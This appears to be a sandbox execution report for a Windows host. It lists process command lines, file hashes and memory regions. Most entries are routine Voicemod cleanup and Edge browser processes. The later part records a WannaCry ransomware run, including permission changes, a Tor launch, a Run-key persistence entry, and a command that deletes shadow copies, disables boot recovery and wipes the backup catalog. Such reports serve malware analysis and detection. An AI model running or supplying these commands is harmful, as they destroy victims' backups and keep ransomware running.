cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-franky-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-franky-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-ghost-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-ghost-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-harmony-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-hurry-up-in*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-hurry-up-loop*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-bee*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-growl*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-leopard*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-tiger*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-magic-chords-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-party-time-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-party-time-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-possessed-background*.wav

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-robot-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-robot-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-romantic-paris*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-romantic-ulala*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-santa-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-sleepyhead*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spacemen-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-speechifier-ovation-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-speechifier-protest-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spirit-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-spirit-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-action-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-drama-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-storyteller-happy-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-student-hall*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-student-playtime*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-sword-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-underwater*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-1*.wav

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-counter-4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-walkie-terror-4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-zombie-vocoder2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cooltune-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-punk-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx01*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx02*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx03*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx04*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx05*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx06*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx07*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx08*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx09*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx10*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx11*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx12*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx13*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx14*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx15*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar5*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-roar6*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky4*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-poison-sticky5*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-exo*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-gameover-amb*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-outofrange*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-blocks-vocoder3*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-titan-background-part1*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-titan-background-part2*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx16*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx17*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx18*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx19*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-custom-fx20*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-bass*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-octava*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-quinta*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cybertune-tercera*.wav

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\b43ab3069362483181a941af35f01f2c /t 2884 /p 2540

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffebf5546f8,0x7ffebf554708,0x7ffebf554718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6820 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6840 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,5572239634436974774,15144085417765346273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8

C:\Users\Admin\Downloads\WannaCry.EXE

"C:\Users\Admin\Downloads\WannaCry.EXE"

C:\Users\Admin\Downloads\WannaCry.EXE

"C:\Users\Admin\Downloads\WannaCry.EXE"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 168181731701469.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\cb0d49af1875490aabfc9dcdc5646821 /t 1696 /p 1328

C:\Users\Admin\Downloads\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\Downloads\@[email protected]

@[email protected] vs

C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rxknciwttsoogz987" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rxknciwttsoogz987" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network


Files

SHA512 32ee74264ecb81d1213b994dd38c5a0fd299afc6dffbd536eba1f6662279a9884debe61e855312c90c2b84b91da28fd20a757cc362d4e207400af4d9a697778d

C:\Users\Admin\AppData\Roaming\@[email protected]

MD5 90788922557cf3d1b2557bbef6887b87
SHA1 0c93138539752df012184e0338dea7626a468913
SHA256 abb94809298b8b574115518cc386604f3593e3499b38ff04401a5ce45c2f855f
SHA512 d92cb237b2e427d7b867d94dd220358570fc0eb936b3fb664ec509d3a63ff33c3727d6ac319ba5071c8cd7e672c3187f4a60741b2e23262ae3df22a8995493d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0ef26930e239597d5ac9634844c5adce
SHA1 1db656684a49bb9046b12f5c64dc08ebaaf1eb12
SHA256 56fe09e53fd2c891cb18b855c5dab57d8366e931dccb267f7905bf9b25bf099f
SHA512 447831b3fcce0f1df45b15214d16e27fc591118565c826e857baa644a775030f217cc0b58181a6f91d29aa11c9b80e5e11ef758f089c5ab1035391677ed9b8fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6806d9af06347331b82a44912390a358
SHA1 e4207527ef524712283277f72bf230cafabf75fd
SHA256 e32a338f5844d4c96c45c1a463035c4247357b4d3eabc5c858b31f3ab04885aa
SHA512 045ecaeb1f77f9ef5b6f9b46c64378a5d7a82b4d92eaca5b29f43290e16097594a723486b2bd4710e2cdd1e02fbab0e62cdcf2cd8a900acbf2d62bea33544442

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 195a87e854474c7fab9676262bd4b2dc
SHA1 40d5b0fac03cc03ad1325dcc3b446c0969e2aad6
SHA256 e684139666b3e5c41e573b5d4defc92b3a566e9173d3149585546fbbb1ee296d
SHA512 8b58cffc4e95fa5ea52dbaac39c31e5601e73a4f7d40d6012d85bb538a3434eb5477f4244f571b5340e3580f0c33d66923435c0c1e187d4301dfc1cfac2e2a8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a4bcedce2a166ab0edc3d88569ffbde2
SHA1 3bda6be3d0da8e1c680042f59ad95d5768c61947
SHA256 5588ed4c4b74dcfcae97e35a1fc5c6d8b6e7c05ac96b52077a76be73d016b4c2
SHA512 23d13c6aabbca735dae38a5954a85d1a1ba8d111c34af239f190c0c940d72a75fd2c17bef797ff140eca39d5f6904388e8ae6456e1dbc230e2a98ca4d1e31e4c

C:\Users\Default\Desktop\@[email protected]

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/1228-2832-0x0000000073BC0000-0x0000000073C42000-memory.dmp

memory/1228-2833-0x0000000073840000-0x0000000073A5C000-memory.dmp

memory/1228-2835-0x0000000073A60000-0x0000000073A82000-memory.dmp

memory/1228-2836-0x0000000000F30000-0x000000000122E000-memory.dmp

memory/1228-2834-0x0000000073A90000-0x0000000073B12000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 e1a6265ad1ca7ea4090a80192b18a182
SHA1 68f845b31c3a7ea8ce8be2c589ba5856948e0aab
SHA256 1618b1c2024e8287f887ba05bf6152fbe65927ea38f56371c4dd56ed8fbcd25a
